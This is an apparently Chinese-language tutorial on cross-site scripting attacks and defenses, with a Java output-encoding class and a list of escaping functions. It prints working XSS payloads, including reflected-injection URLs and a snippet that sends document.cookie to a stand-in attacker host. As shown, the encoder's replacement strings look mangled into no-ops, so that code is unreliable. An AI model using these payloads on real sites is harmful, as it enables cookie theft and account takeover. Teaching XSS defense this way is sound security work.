xss攻擊原理與解決方法

概述：

XSS攻擊是Web攻擊中最常見的攻擊方法之一，它是通過對網頁注入可執行代碼且成功地被浏覽器執行，達到攻擊的目的，形成了一次有效XSS攻擊，一旦攻擊成功，它可以擷取使用者的聯系人清單，然後向聯系人發送虛假資訊，可以删除使用者的日志等等，有時候還和其他攻擊方式同時實施比如SQL注入攻擊伺服器和資料庫、Click劫持、相對連結劫持等實施釣魚，它帶來的危害是巨大的，是web安全的頭号大敵。

攻擊的條件：

實施XSS攻擊需要具備兩個條件：

一、需要向web頁面注入惡意代碼；

二、這些惡意代碼能夠被浏覽器成功的執行。

看一下下面這個例子：

<div id="el" style="background:url('javascript:eval(document.getElementById("el").getAttribute("code")) ')"

code="var a = document.createElement('a');

a.innerHTML= '執行了惡意代碼';document.body.appendChild(a);

//這這裡執行代碼

">

</div>

這段代碼在舊版的IE8和IE8以下的版本都是可以被執行的，火狐也能執行代碼，但火狐對其禁止通路DOM對象，是以在火狐下執行将會看到控制裡抛出異常：document is not defined （document是沒有定義的）

再來看一下面這段代碼：

<div>

<img src="/images/handler.ashx?id=<%= Request.QueryString["id"] %>" />

</div>

相信很多程式員都覺得這個代碼很正常，其實這個代碼就存在一個反射型的XSS攻擊，假如輸入下面的位址：

http://www.xxx.com/?id=" /><script>alert(/xss/)</script><br x="

最終反射出來的HTML代碼：

<div>

<img src="/images/handler.ashx?id=" /><script>alert(/xss/)</script><br x="" />

</div>

也許您會覺得把ValidateRequest設定為true或者保持預設值就能高枕無憂了，其實這種情況還可以輸入下面的位址達到相同的攻擊效果：

http://www.xxx.com/?id=xx" οnerrοr="this.onload()" οnlοad="alert(/xss/)" x="

根據XSS攻擊的效果可以分為幾種類型：

第一、XSS反射型攻擊，惡意代碼并沒有儲存在目标網站，通過引誘使用者點選一個連結到目标網站的惡意連結來實施攻擊的。

第二、XSS存儲型攻擊，惡意代碼被儲存到目标網站的伺服器中，這種攻擊具有較強的穩定性和持久性，比較常見場景是在部落格，論壇等社交網站上，但OA系統，和CRM系統上也能看到它身影，比如：某CRM系統的客戶投訴功能上存在XSS存儲型漏洞，黑客送出了惡意攻擊代碼，當系統管理者檢視投訴資訊時惡意代碼執行，竊取了客戶的資料，然而管理者毫不知情，這就是典型的XSS存儲型攻擊。

XSS攻擊能做些什麼：

1.竊取cookies，讀取目标網站的cookie發送到黑客的伺服器上，如下面的代碼：

var i=document.createElement("img");

document.body.appendChild(i);

i.src = "http://www.hackerserver.com/?c=" + document.cookie;

2.讀取使用者未公開的資料，如果：郵件清單或者内容、系統的客戶資料，聯系人清單等等，如代碼：

解決方法：

一種方法是在表單送出或者url參數傳遞前，對需要的參數進行過濾,請看如下XSS過濾工具類代碼

import java.net.URLEncoder;

public class EncodeFilter {

//過濾大部分html字元

public static String encode(String input) {

if (input == null) {

return input;

}

StringBuilder sb = new StringBuilder(input.length());

for (int i = 0, c = input.length(); i < c; i++) {

char ch = input.charAt(i);

switch (ch) {

case '&': sb.append("&");

break;

case '<': sb.append("<");

break;

case '>': sb.append(">");

break;

case '"': sb.append(""");

break;

case '\'': sb.append("'");

break;

case '/': sb.append("/");

break;

default: sb.append(ch);

}

}

return sb.toString();

}

//js端過濾

public static String encodeForJS(String input) {

if (input == null) {

return input;

}

StringBuilder sb = new StringBuilder(input.length());

for (int i = 0, c = input.length(); i < c; i++) {

char ch = input.charAt(i);

// do not encode alphanumeric characters and ',' '.' '_'

if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||

ch >= '0' && ch <= '9' ||

ch == ',' || ch == '.' || ch == '_') {

sb.append(ch);

} else {

String temp = Integer.toHexString(ch);

// encode up to 256 with \\xHH

if (ch < 256) {

sb.append('\\').append('x');

if (temp.length() == 1) {

sb.append('0');

}

sb.append(temp.toLowerCase());

// otherwise encode with \\uHHHH

} else {

sb.append('\\').append('u');

for (int j = 0, d = 4 - temp.length(); j < d; j ++) {

sb.append('0');

}

sb.append(temp.toUpperCase());

}

}

}

return sb.toString();

}

public static String encodeForCSS(String input) {

if (input == null) {

return input;

}

StringBuilder sb = new StringBuilder(input.length());

for (int i = 0, c = input.length(); i < c; i++) {

char ch = input.charAt(i);

// check for alphanumeric characters

if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||

ch >= '0' && ch <= '9') {

sb.append(ch);

} else {

// return the hex and end in whitespace to terminate

sb.append('\\').append(Integer.toHexString(ch)).append(' ');

}

}

return sb.toString();

}

public static String encodeURIComponent(String input) {

return encodeURIComponent(input, "utf-8");

}

public static String encodeURIComponent(String input, String encoding) {

if (input == null) {

return input;

}

String result;

try {

result = URLEncoder.encode(input, encoding);

} catch (Exception e) {

result = "";

}

return result;

}

public static boolean isValidURL(String input) {

if (input == null || input.length() < 8) {

return false;

}

char ch0 = input.charAt(0);

if (ch0 == 'h') {

if (input.charAt(1) == 't' &&

input.charAt(2) == 't' &&

input.charAt(3) == 'p') {

char ch4 = input.charAt(4);

if (ch4 == ':') {

if (input.charAt(5) == '/' &&

input.charAt(6) == '/') {

return isValidURLChar(input, 7);

} else {

return false;

}

} else if (ch4 == 's') {

if (input.charAt(5) == ':' &&

input.charAt(6) == '/' &&

input.charAt(7) == '/') {

return isValidURLChar(input, 8);

} else {

return false;

}

} else {

return false;

}

} else {

return false;

}

} else if (ch0 == 'f') {

if( input.charAt(1) == 't' &&

input.charAt(2) == 'p' &&

input.charAt(3) == ':' &&

input.charAt(4) == '/' &&

input.charAt(5) == '/') {

return isValidURLChar(input, 6);

} else {

return false;

}

}

return false;

}

static boolean isValidURLChar(String url, int start) {

for (int i = start, c = url.length(); i < c; i ++) {

char ch = url.charAt(i);

if (ch == '"' || ch == '\'') {

return false;

}

}

return true;

}

}

二、 過濾使用者輸入的 檢查使用者輸入的内容中是否有非法内容。如<>（尖括号）、”（引号）、 ‘（單引号）、%（百分比符号）、;（分号）、()（括号）、&（& 符号）、+（加号）等。、嚴格控制輸出

可以利用下面這些函數對出現xss漏洞的參數進行過濾

1、htmlspecialchars() 函數,用于轉義處理在頁面上顯示的文本。

2、htmlentities() 函數,用于轉義處理在頁面上顯示的文本。

3、strip_tags() 函數,過濾掉輸入、輸出裡面的惡意标簽。

4、header() 函數,使用header("Content-type:application/json"); 用于控制 json 資料的頭部，不用于浏覽。

5、urlencode() 函數,用于輸出處理字元型參數帶入頁面連結中。

6、intval() 函數用于處理數值型參數輸出頁面中。

7、自定義函數,在大多情況下，要使用一些常用的 html 标簽，以美化頁面顯示，如留言、小紙條。那麼在這樣的情況下，要采用白名單的方法使用合法的标簽顯示，過濾掉非法的字元。

各語言示例：

PHP的htmlentities()或是htmlspecialchars()。

Python的cgi.escape()。

ASP的Server.HTMLEncode()。

ASP.NET的Server.HtmlEncode()或功能更強的Microsoft Anti-Cross Site Scripting Library

Java的xssprotect(Open Source Library)。

Node.js的node-validator。